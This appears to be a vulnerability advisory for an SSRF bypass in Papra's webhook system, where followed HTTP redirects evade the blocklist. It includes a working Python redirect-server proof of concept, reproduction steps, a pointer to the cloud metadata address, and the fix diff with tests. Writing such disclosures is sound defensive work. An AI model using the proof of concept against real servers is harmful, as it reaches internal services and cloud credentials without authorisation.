Papra HTTP redirect bypass can lead to SSRF via webhook delivery system
Description
Summary
Papra's webhook delivery system contains an SSRF protection bypass that allows any authenticated organisation member to cause the server to make HTTP requests to internal addresses — loopback, link-local, and RFC-1918 ranges. The SSRF protection validates the registered webhook URL but ignores redirect destinations. The HTTP client (ofetch) follows 3xx responses automatically, and the redirect target is never checked against the blocklist. An attacker registers a webhook pointing to an attacker-controlled server, which redirects incoming POSTs to any internal address. Exploitation was confirmed by live test against the official Docker image. The fix is a single-line change to the webhook HTTP client.
Details
The vulnerable call
The webhook HTTP client in packages/webhooks/src/webhooks.services.ts (lines 16–19) calls ofetch.raw() without specifying a redirect option:
const response = await ofetch.raw(url, {
...options,
ignoreResponseError: true,
// no `redirect` option — defaults to 'follow' per Fetch API spec
});
ofetch is a thin wrapper around the WHATWG Fetch API. The Fetch specification defines three redirect modes — follow, error, and manual — and sets follow as the default. In follow mode, the HTTP implementation resolves the redirect chain internally and returns only the final response; application code receives the terminal response with no indication that any redirects occurred. ofetch 1.4.1 does not set a redirect option in its internal fetch() call, so the default applies. The ignoreResponseError: true option only suppresses exceptions on non-2xx responses; it has no effect on redirect handling.
How the bypass works
The SSRF protection runs at two points: registration time (checkWebhookUrlIsSsrfSafe, webhooks.usecases.ts:34) and delivery time (filterOutSsrfUnsafeWebhooks, webhooks.usecases.ts:124). Both checks work the same way:
// apps/papra-server/src/modules/shared/ssrf/ssrf.services.ts, lines 20-27
const hostname = getUrlHostname(url);
return isHostnameSsrfSafe({ hostname, allowedHostnames, dnsLookup, logger });
// Resolves hostname → checks all resulting IPs against the blocklist
// Blocklist covers: 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16,
// 169.254.0.0/16, ::1, and other reserved ranges
Both checks operate on url — the registered webhook URL, a public hostname that resolves to a public IP and passes the blocklist. Neither check has any visibility into where the HTTP client will end up after following a redirect. The Location header in a 3xx response is never extracted, never DNS-resolved, and never compared against the blocklist. By the time the redirect target is known to the Fetch implementation, the request has already been made.
The developer cannot observe this gap. The Fetch API gives no opportunity to inspect the redirect target before following it.
Evidence
Attacker's redirect server receives the POST and returns 302:
[2026-05-08T15:55:38.388647] POST /redirect
User-Agent: papra-webhook-client ← set only in webhooks.services.ts:47
X-Forwarded-For:
"POST /redirect HTTP/1.1" 302 -
Papra's inbound request log immediately after — this is the server logging a request arriving at itself:
{"message":"Request completed","timestampMs":1778255738420,
"data":{"status":200,"method":"GET","path":"/api/health",
"userAgent":"papra-webhook-client"}} ← outbound UA on an inbound request
papra-webhook-client is set exclusively by the outbound webhook delivery code (webhooks.services.ts:47). Its presence on an inbound log entry is only possible if Papra's own HTTP client followed the 302 and made a request to the loopback. The delivery record confirms the internal endpoint responded HTTP 200:
{"message":"Webhook triggered","timestampMs":1778255738422,
"data":{"responseStatus":200,"webhookId":"wbh_s6t1xzezbzbivyhptcs7qxhk"}}
PoC
- Start
redirect_server.pyon a publicly reachable server (ngrok free tier is sufficient). The example below uses Papra's own health endpoint as the redirect target to demonstrate the bypass — in a cloud environment replaceREDIRECT_TARGETwithhttp://169.254.169.254/latest/meta-data/or any internal address.
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import datetime
REDIRECT_TARGET = "http://127.0.0.1:1221/api/health" # replace with desired internal target
class RedirectHandler(BaseHTTPRequestHandler):
def do_POST(self):
content_len = int(self.headers.get("Content-Length", 0))
body = self.rfile.read(content_len)
print(f"[{datetime.datetime.now(datetime.timezone.utc).isoformat()}] POST {self.path}")
print(f" User-Agent: {self.headers.get('User-Agent')}")
print(f" Body: {body[:200]}")
self.send_response(302)
self.send_header("Location", REDIRECT_TARGET)
self.end_headers()
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
pass
if __name__ == "__main__":
server = ThreadedHTTPServer(("0.0.0.0", 9999), RedirectHandler)
print("Redirect server running on port 9999")
server.serve_forever()
> ThreadingMixIn is required — Papra immediately opens a second connection to the same port when following the redirect; a single-threaded server deadlocks.
2. Register a webhook pointing to the redirect server: `` POST /api/organizations/{orgId}/webhooks {"name":"ssrf-test","url":"https://{ngrok-url}/redirect","events":["document:created"]} ``
- Upload any document to the organisation to fire a
document:createdevent. - Confirm on the Papra server logs that
/api/healthreceived a GET request withUser-Agent: papra-webhook-client.
Impact
- Any authenticated org member (no admin role required) can trigger the exploit.
- The Papra server makes HTTP requests to internal addresses blocked by its own SSRF list:
127.0.0.0/8,169.254.0.0/16, RFC-1918 ranges. - This is blind SSRF — internal response bodies are written to
webhook_deliveriesbut no API route exposes delivery records. Response content is not accessible to the attacker through the Papra API. - Internal network topology can be partially inferred from whether requests succeed or fail (closed port produces a network error; open port returns an HTTP response).
- HTTP 307 redirects preserve the POST method and body, enabling state-changing requests to internal services that accept unauthenticated POSTs.
- On cloud deployments (AWS, GCP, Azure), the instance metadata service at
169.254.169.254is reachable by the same technique. Cloud IMDS was not tested in this PoC (local Docker environment, no metadata service present). Response exfiltration via the Papra API remains unavailable regardless.
Suggested Fix
Add redirect: 'manual' to the ofetch.raw() call in packages/webhooks/src/webhooks.services.ts (line 16) and treat any 3xx response as a delivery failure. Webhook endpoints have no legitimate reason to redirect:
const response = await ofetch.raw(url, {
...options,
redirect: 'manual', // do not follow redirects
ignoreResponseError: true,
});
If redirect-following is ever required in the future, validate the Location header through the existing isUrlSsrfSafe() check before re-issuing the request.
Affected products
1Patches
1086dccbfda18feat(webhooks): add SSRF protection at proper fetch time (#1099)
11 files changed · +472 −1300
apps/papra-server/package.json+1 −0 modified@@ -81,6 +81,7 @@ "resend": "^4.6.0", "stripe": "^17.7.0", "tsx": "catalog:", + "undici": "^8.2.0", "valibot": "catalog:" }, "devDependencies": {
apps/papra-server/src/modules/webhooks/webhooks.http-client.ts+61 −0 added@@ -0,0 +1,61 @@ +import type { WebhookHttpClient } from '@papra/webhooks'; +import type { BlockList } from 'node:net'; +import { ofetch } from 'ofetch'; +import { Agent } from 'undici'; +import { ssrfBlockList } from '../shared/ssrf/ssrf.models'; +import { getUrlHostname } from '../shared/urls/urls.models'; + +export function createWebhookHttpClient({ + isSsrfProtectionEnabled, + allowedHostnames, + blockList = ssrfBlockList, +}: { + isSsrfProtectionEnabled: boolean; + allowedHostnames: Set<string>; + blockList?: BlockList; +}): WebhookHttpClient { + const ssrfSafeAgent = isSsrfProtectionEnabled + ? new Agent({ connect: { blockList } }) + : undefined; + + return async ({ url, ...options }) => { + const hostname = getUrlHostname(url); + const isAllowlisted = hostname !== null && allowedHostnames.has(hostname); + const dispatcher = isAllowlisted ? undefined : ssrfSafeAgent; + + const response = await ofetch.raw<unknown>(url, { + ...options, + // @ts-expect-error ofetch resolves undici types from the root install (pulled in by some transitive dep) which may differ from the server's direct undici dep. Runtime is compatible. + dispatcher, + ignoreResponseError: true, + redirect: 'manual', // don't follow redirects, just return the 3xx response + }); + + return { + responseStatus: response.status, + responseData: response._data, + }; + }; +} + +export function isSsrfBlockedError(error: unknown): boolean { + if (!Error.isError(error)) { + return false; + } + + if ('code' in error && error.code === 'ERR_IP_BLOCKED') { + return true; + } + + // check if error is an AggregateError containing ssrf blocked errors + if (error instanceof AggregateError) { + return error.errors.some(isSsrfBlockedError); + } + + // check if error has a cause that is an ssrf blocked error + if ('cause' in error) { + return isSsrfBlockedError(error.cause); + } + + return false; +}
apps/papra-server/src/modules/webhooks/webhooks.trigger.services.ts+7 −1 modified@@ -1,6 +1,7 @@ import type { WebhookRepository } from './webhooks.repository'; import type { WebhooksConfig } from './webhooks.types'; import { injectArguments } from '@corentinth/chisels'; +import { createWebhookHttpClient } from './webhooks.http-client'; import { deferTriggerWebhooks, triggerWebhooks } from './webhooks.usecases'; export type WebhookTriggerServices = ReturnType<typeof createWebhookTriggerServices>; @@ -12,11 +13,16 @@ export function createWebhookTriggerServices({ webhooksConfig: WebhooksConfig; webhookRepository: WebhookRepository; }) { + const httpClient = createWebhookHttpClient({ + isSsrfProtectionEnabled: webhooksConfig.isSsrfProtectionEnabled, + allowedHostnames: webhooksConfig.webhookUrlAllowedHostnames, + }); + return injectArguments({ triggerWebhooks, deferTriggerWebhooks, }, { - webhooksConfig, webhookRepository, + httpClient, }); }
apps/papra-server/src/modules/webhooks/webhooks.usecases.test.ts+45 −42 modified@@ -5,7 +5,7 @@ import { ORGANIZATION_ROLES } from '../organizations/organizations.constants'; import { createTestLogger } from '../shared/logger/logger.test-utils'; import { omit } from '../shared/objects'; import { createWebhookRepository } from './webhooks.repository'; -import { webhookEventsTable, webhooksTable } from './webhooks.tables'; +import { webhookDeliveriesTable, webhookEventsTable, webhooksTable } from './webhooks.tables'; import { createWebhook, triggerWebhooks, updateWebhook } from './webhooks.usecases'; describe('webhook usecases', () => { @@ -164,7 +164,7 @@ describe('webhook usecases', () => { }); describe('triggerWebhooks', () => { - test('when SSRF protection is enabled, webhooks with unsafe URLs are filtered out and others still receive the event', async () => { + test('when one webhook delivery fails (e.g. blocked by SSRF protection at connect time), sibling webhooks still complete', async () => { const { db } = await createInMemoryDatabase({ organizations: [ { id: 'org_1', name: 'Organization 1' }, @@ -181,7 +181,7 @@ describe('webhook usecases', () => { const webhookRepository = createWebhookRepository({ db }); const { logger } = createTestLogger(); - const triggerWebhookServiceArgs: unknown[] = []; + const httpClientArgs: { url: string }[] = []; await triggerWebhooks({ webhookRepository, @@ -195,18 +195,28 @@ describe('webhook usecases', () => { updatedAt: new Date('2025-01-01'), }], logger, - triggerWebhookService: async (args) => { - triggerWebhookServiceArgs.push(args); - return { responseData: {}, responseStatus: 200, requestPayload: '{}' }; - }, - webhooksConfig: { - isSsrfProtectionEnabled: true, - webhookUrlAllowedHostnames: new Set<string>(), + httpClient: async (args) => { + httpClientArgs.push(args); + + if (args.url.includes('192.168')) { + const error = new Error('IP 192.168.1.1 is blocked by net.BlockList') as Error & { code?: string }; + error.code = 'ERR_IP_BLOCKED'; + throw error; + } + + return { responseData: {}, responseStatus: 200 }; }, }); - expect(triggerWebhookServiceArgs).to.have.lengthOf(1); - expect((triggerWebhookServiceArgs[0] as { webhookUrl: string }).webhookUrl).to.eql('https://example.com/webhook'); + expect(httpClientArgs.map(a => a.url)).to.eql([ + 'https://192.168.1.1/webhook', + 'https://example.com/webhook', + ]); + + const deliveries = await db.select().from(webhookDeliveriesTable); + + expect(deliveries.length).to.eq(1); + expect(deliveries[0]).to.include({ responseStatus: 200 }); }); test('when an organization has webhooks enabled for an event, the configured urls are called with the event payload', async () => { @@ -238,7 +248,7 @@ describe('webhook usecases', () => { const webhookRepository = createWebhookRepository({ db }); const { logger } = createTestLogger(); - const triggerWebhookServiceArgs: unknown[] = []; + const httpClientArgs: { url: string; body: string; headers: Record<string, string> }[] = []; const eventPayload = { documentId: 'doc_1', @@ -255,39 +265,32 @@ describe('webhook usecases', () => { payloads: [eventPayload], logger, now: new Date('2025-05-04'), - triggerWebhookService: async (args) => { - triggerWebhookServiceArgs.push(args); - - const { event, payload } = args; - - return { - responseData: {}, - responseStatus: 200, - requestPayload: JSON.stringify({ event, payload }), - }; - }, - webhooksConfig: { - isSsrfProtectionEnabled: false, - webhookUrlAllowedHostnames: new Set<string>(), + httpClient: async (args) => { + httpClientArgs.push(args); + return { responseData: {}, responseStatus: 200 }; }, }); - expect(triggerWebhookServiceArgs).to.eql([ - { - webhookUrl: 'https://example.com/webhook1', - webhookSecret: null, - now: new Date('2025-05-04'), - event: 'document:created', - payload: eventPayload, - }, - { - webhookUrl: 'https://example.com/webhook3', - webhookSecret: 'secret3', - now: new Date('2025-05-04'), - event: 'document:created', - payload: eventPayload, - }, + expect(httpClientArgs.map(a => a.url)).to.eql([ + 'https://example.com/webhook1', + 'https://example.com/webhook3', ]); + + for (const args of httpClientArgs) { + expect(JSON.parse(args.body)).to.eql({ + type: 'document:created', + timestamp: '2025-05-04T00:00:00.000Z', + data: { + ...eventPayload, + createdAt: eventPayload.createdAt.toISOString(), + updatedAt: eventPayload.updatedAt.toISOString(), + }, + }); + } + + // Only the webhook with a configured secret should produce a signature header + expect(httpClientArgs[0]?.headers['webhook-signature']).toBeUndefined(); + expect(typeof httpClientArgs[1]?.headers['webhook-signature']).to.eq('string'); }); }); });
apps/papra-server/src/modules/webhooks/webhooks.usecases.ts+35 −65 modified@@ -1,14 +1,15 @@ -import type { EventName, WebhookPayloads } from '@papra/webhooks'; +import type { EventName, WebhookHttpClient, WebhookPayloads } from '@papra/webhooks'; import type { Logger } from '../shared/logger/logger'; import type { WebhookRepository } from './webhooks.repository'; import type { Webhook, WebhookMultiplePayloads, WebhooksConfig } from './webhooks.types'; -import { triggerWebhook as triggerWebhookServiceImpl } from '@papra/webhooks'; +import { triggerWebhook as triggerWebhookService } from '@papra/webhooks'; import pLimit from 'p-limit'; import { createDeferable } from '../shared/async/defer'; import { createLogger } from '../shared/logger/logger'; -import { createCachedIsUrlSsrfSafeFunction, isUrlSsrfSafe } from '../shared/ssrf/ssrf.services'; +import { isUrlSsrfSafe } from '../shared/ssrf/ssrf.services'; import { WEBHOOK_URL_ALLOWED_HOSTNAMES_ENV_VAR } from './webhooks.constants'; import { createSsrfUnsafeUrlError, createWebhookNotFoundError } from './webhooks.errors'; +import { isSsrfBlockedError } from './webhooks.http-client'; export async function createWebhook({ name, @@ -103,16 +104,14 @@ export async function triggerWebhooks({ organizationId, now = new Date(), logger = createLogger({ namespace: 'webhook' }), - triggerWebhookService = triggerWebhookServiceImpl, - webhooksConfig, + httpClient, ...multiplePayloadsData }: { webhookRepository: WebhookRepository; organizationId: string; now?: Date; logger?: Logger; - triggerWebhookService?: typeof triggerWebhookServiceImpl; - webhooksConfig: WebhooksConfig; + httpClient: WebhookHttpClient; } & WebhookMultiplePayloads) { const { event } = multiplePayloadsData; const singlePayloads = splitMultiplePayloads(multiplePayloadsData); @@ -121,59 +120,19 @@ export async function triggerWebhooks({ logger.info({ webhooksCount: webhooks.length, organizationId, event, payloadsCount: singlePayloads.length }, 'Triggering webhooks'); - const safeWebhooks = await filterOutSsrfUnsafeWebhooks({ webhooks, webhooksConfig, logger }); - const limit = pLimit(10); await Promise.all( - safeWebhooks.flatMap(webhook => + webhooks.flatMap(webhook => singlePayloads.map(async webhookData => limit(async () => - triggerWebhook({ webhook, webhookRepository, now, ...webhookData, logger, triggerWebhookService }), + triggerWebhook({ webhook, webhookRepository, now, ...webhookData, logger, httpClient }), ), ), ), ); } -async function filterOutSsrfUnsafeWebhooks({ - webhooks, - webhooksConfig, - logger, -}: { - webhooks: Webhook[]; - webhooksConfig: WebhooksConfig; - logger: Logger; -}): Promise<Webhook[]> { - if (!webhooksConfig.isSsrfProtectionEnabled) { - return webhooks; - } - - const limit = pLimit(10); - - // Caching is done at the function level to limit the TOCTOU window while still avoiding redundant checks for duplicate URLs across webhooks - const isUrlSsrfSafeCached = createCachedIsUrlSsrfSafeFunction({ - allowedHostnames: webhooksConfig.webhookUrlAllowedHostnames, - logger, - }); - - const checked = await Promise.all( - webhooks.map(async webhook => - limit(async () => { - const isSafe = await isUrlSsrfSafeCached({ url: webhook.url }); - - if (!isSafe) { - reportNonSsrfSafeWebhookUrl({ url: webhook.url, logger }); - } - - return { webhook, isSafe }; - }), - ), - ); - - return checked.filter(({ isSafe }) => isSafe).map(({ webhook }) => webhook); -} - function splitMultiplePayloads(data: WebhookMultiplePayloads): WebhookPayloads[] { return data.payloads.map(payload => ({ event: data.event, payload })) as WebhookPayloads[]; } @@ -185,36 +144,47 @@ async function triggerWebhook({ webhookRepository, now = new Date(), logger = createLogger({ namespace: 'webhook' }), - triggerWebhookService = triggerWebhookServiceImpl, + httpClient, ...webhookData }: { webhook: Webhook; webhookRepository: WebhookRepository; + httpClient: WebhookHttpClient; now?: Date; logger?: Logger; - triggerWebhookService?: typeof triggerWebhookServiceImpl; } & WebhookPayloads) { const { url, secret, organizationId } = webhook; const { event } = webhookData; logger.info({ webhookId: webhook.id, event, organizationId }, 'Triggering webhook'); - const { responseData, responseStatus, requestPayload } = await triggerWebhookService({ - webhookUrl: url, - webhookSecret: secret, - now, - ...webhookData, - }); + try { + const { responseData, responseStatus, requestPayload } = await triggerWebhookService({ + webhookUrl: url, + webhookSecret: secret, + now, + httpClient, + ...webhookData, + }); - logger.info({ webhookId: webhook.id, event, responseStatus, organizationId }, 'Webhook triggered'); + logger.info({ webhookId: webhook.id, event, responseStatus, organizationId }, 'Webhook triggered'); - await webhookRepository.saveWebhookDelivery({ - webhookId: webhook.id, - eventName: event, - requestPayload: JSON.stringify(requestPayload), - responsePayload: JSON.stringify(responseData), - responseStatus, - }); + await webhookRepository.saveWebhookDelivery({ + webhookId: webhook.id, + eventName: event, + requestPayload: JSON.stringify(requestPayload), + responsePayload: JSON.stringify(responseData), + responseStatus, + }); + } catch (error) { + const blockedBySsrf = isSsrfBlockedError(error); + + if (blockedBySsrf) { + reportNonSsrfSafeWebhookUrl({ url, logger }); + } else { + logger.error({ webhookId: webhook.id, event, organizationId, error }, 'Webhook delivery failed'); + } + } } function reportNonSsrfSafeWebhookUrl({ url, logger }: { url: string; logger: Logger }) {
.changeset/cuddly-ravens-taste.md+5 −0 added@@ -0,0 +1,5 @@ +--- +"@papra/app": patch +--- + +Webhooks no longer follow http redirects (3xx responses) when sending requests.
.changeset/sweet-windows-knock.md+5 −0 added@@ -0,0 +1,5 @@ +--- +"@papra/app": patch +--- + +Webhooks ssrf validation is now enforced when sending webhook requests, preventing potential TOCTOU dns rebinding attacks (the exploitation window was very small and only theoretical though).
.changeset/violet-rats-end.md+5 −0 added@@ -0,0 +1,5 @@ +--- +"@papra/webhooks": patch +--- + +Export the http client type.
packages/webhooks/src/index.ts+1 −1 modified@@ -1,4 +1,4 @@ export { createWebhooksHandler } from './handler/handler.services'; export { EVENT_NAMES, type EventName } from './webhooks.constants'; -export { triggerWebhook } from './webhooks.services'; +export { triggerWebhook, type WebhookHttpClient } from './webhooks.services'; export type { StandardWebhookEventPayload, WebhookEvents, WebhookPayload, WebhookPayloads } from './webhooks.types';
packages/webhooks/src/webhooks.services.ts+9 −7 modified@@ -4,15 +4,17 @@ import { ofetch } from 'ofetch'; import { signBody } from './signature'; import { serializeBody } from './webhooks.models'; -export async function webhookHttpClient({ - url, - ...options -}: { +export type WebhookHttpClient = (args: { url: string; method: string; body: string; headers: Record<string, string>; -}) { +}) => Promise<{ + responseStatus: number; + responseData: unknown; +}>; + +export const webhookHttpClient: WebhookHttpClient = async ({ url, ...options }) => { const response = await ofetch.raw<unknown>(url, { ...options, ignoreResponseError: true, @@ -22,7 +24,7 @@ export async function webhookHttpClient({ responseStatus: response.status, responseData: response._data, }; -} +}; export async function triggerWebhook<T extends WebhookPayloads>({ webhookUrl, @@ -35,7 +37,7 @@ export async function triggerWebhook<T extends WebhookPayloads>({ }: { webhookUrl: string; webhookSecret?: string | null; - httpClient?: typeof webhookHttpClient; + httpClient?: WebhookHttpClient; payload: T['payload']; now?: Date; event: T['event'];
pnpm-lock.yaml+298 −1184 modified
Vulnerability mechanics
Root cause
"The HTTP client automatically follows redirects without validating the redirect destination against a blocklist."
Attack vector
An authenticated organization member registers a webhook with a URL pointing to an attacker-controlled server. This server is configured to respond to incoming POST requests with a 3xx redirect to an internal address. The Papra server's HTTP client follows this redirect, making a request to the internal address, bypassing SSRF protections that only check the initial URL [ref_id=1]. Exploitation was confirmed against the official Docker image [ref_id=1].
Affected code
The vulnerable code resides in the webhook HTTP client within `packages/webhooks/src/webhooks.services.ts`. Specifically, the `ofetch.raw()` call on lines 16-19 defaults to following redirects, which bypasses SSRF checks performed earlier in the process [ref_id=1]. The fix is implemented in `apps/papra-server/src/modules/webhooks/webhooks.http-client.ts` by setting `redirect: 'manual'` [patch_id=5478038].
What the fix does
The patch modifies the webhook HTTP client to set the `redirect` option to `'manual'` instead of the default `'follow'` [patch_id=5478038]. This prevents the client from automatically following 3xx redirects. Any redirect responses are now treated as delivery failures, ensuring that the redirect target is not implicitly trusted and preventing SSRF attacks via redirect chains [ref_id=1].
Preconditions
- authAttacker must be an authenticated organization member.
Reproduction
1. Start `redirect_server.py` on a publicly reachable server (e.g., using ngrok). Configure `REDIRECT_TARGET` to an internal address like `http://127.0.0.1:1221/api/health`. 2. Register a webhook pointing to the redirect server: `POST /api/organizations/{orgId}/webhooks` with `{"name":"ssrf-test","url":"https://{{ngrok-url}}/redirect","events":["document:created"]}`. 3. Upload any document to trigger the `document:created` event. 4. Confirm on the Papra server logs that an internal endpoint (e.g., `/api/health`) received a GET request with `User-Agent: papra-webhook-client` [ref_id=1].
Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3News mentions
0No linked articles in our index yet.